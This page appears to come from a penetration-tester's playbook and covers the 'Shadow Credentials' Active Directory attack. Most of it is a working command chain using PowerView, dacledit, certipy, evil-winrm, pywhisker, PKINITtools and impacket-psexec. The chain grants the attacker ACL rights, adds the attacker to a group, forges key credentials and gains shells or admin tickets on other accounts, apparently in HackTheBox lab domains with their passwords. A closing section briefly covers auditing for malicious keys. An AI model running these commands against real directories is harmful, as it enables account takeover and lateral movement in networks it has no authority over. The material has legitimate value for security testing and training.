🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  • Overview
  • Pre-requisites
  • Steps to perform - windows
  • Steps to perform - Linux
  • Performing with other tools
  • AD Auditing
  1. Scenarios

Shadow Credentials

Overview

This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates.

Unless you have some rights in the Certerficate authority this attack will only be available in the key trust model.

Key trust

pros

  • Doesnt require ca to setup

  • Does use tpm cons

  • No centralized administration. Keys must be disabled per object

  • self signed cert (arguably the whole problem with this model)

Pre-requisites

Besides the ability to write the attribute msDS-KeyCredentialLink on a target user or computer, for this technique to work, the environment must be set up as follows:

  • At least one Windows Server 2016 Domain Controller.

  • A digital certificate for Server Authentication installed on the Domain Controller.

  • Windows Server 2016 Functional Level in Active Directory.

  • Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

  • Domain must have at least one DC running with Windows Server 2016 that supports PKINIT.

Steps to perform - windows

$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Network Audit" -Rights All -PrincipalIdentity m.lovegod -DomainController dc.absolute.htb
Add-DomainGroupMember -Credential $cred -Identity "Network Audit" -member m.lovegod -Domain "absolute.htb"
Get-DomainGroupMember -Credential $cred -Identity "Network Audit" -Domain "absolute.htb" -DomainController "dc.absolute.htb" | fl MemberName
kinit m.lovegod
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb 
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb

Steps to perform - Linux

#Install dacledit branch of impacket
git clone https://github.com/shutdown/impacket -b dacledit
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install .
#Write yourself some ACLs on the object
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!'
#Add yourself to the group
net rpc group addmem 'Network Audit' m.lovegod -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Verify
net rpc group members 'Network Audit' -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Use certipy for shadow credential
kinit m.lovegod #or impacket=gettgt
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
#Restore ACLs
dacledit.py -action restore -file ./impacket/examples/dacledit-20240508-144024.bak -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!' -k

Performing with other tools

python3 pywhisker.py -d "zsm.local" -u "marcus" -p '!QAZ2wsx' -t 'ZPH-SVRMGMT1$' --action "add" -P P@ssw0rd -f cert

python ../PKINITtools/gettgtpkinit.py 'zsm.local/ZPH-SVRMGMT1$' -cert-pfx cert.pfx -pfx-pass P@ssw0rd zph-svrmgmt1.ccache

export KRB5CCNAME=zph-svrmgmt1.ccache

python ../PKINITtools/gets4uticket.py kerberos+ccache://'zsm.local\ZPH-SVRMGMT1$':zph-svrmgmt1.ccache@192.168.210.10 cifs/zph-svrmgmt1.zsm.local@zsm.local administrator@zsm.local admin.ccache -v

export KRB5CCNAME=admin.ccache

impacket-psexec -k ZPH-SVRMGMT1.ZSM.LOCAL

AD Auditing

![[Pasted image 20240510073403.png]] This can be used to find orphaned or malicious keys existing in AD.

Also the DSInternals module can find ROCA vulnerable / weak keys in AD

cleaning up a user and device object in ad will affect ALL devices a user has access to (DSInternals allows selective deletion of keys) ![[Pasted image 20240510074200.png]]![[Pasted image 20240510074315.png]]

PreviousReset password with mimikatzNextSign Powershell script
⛓️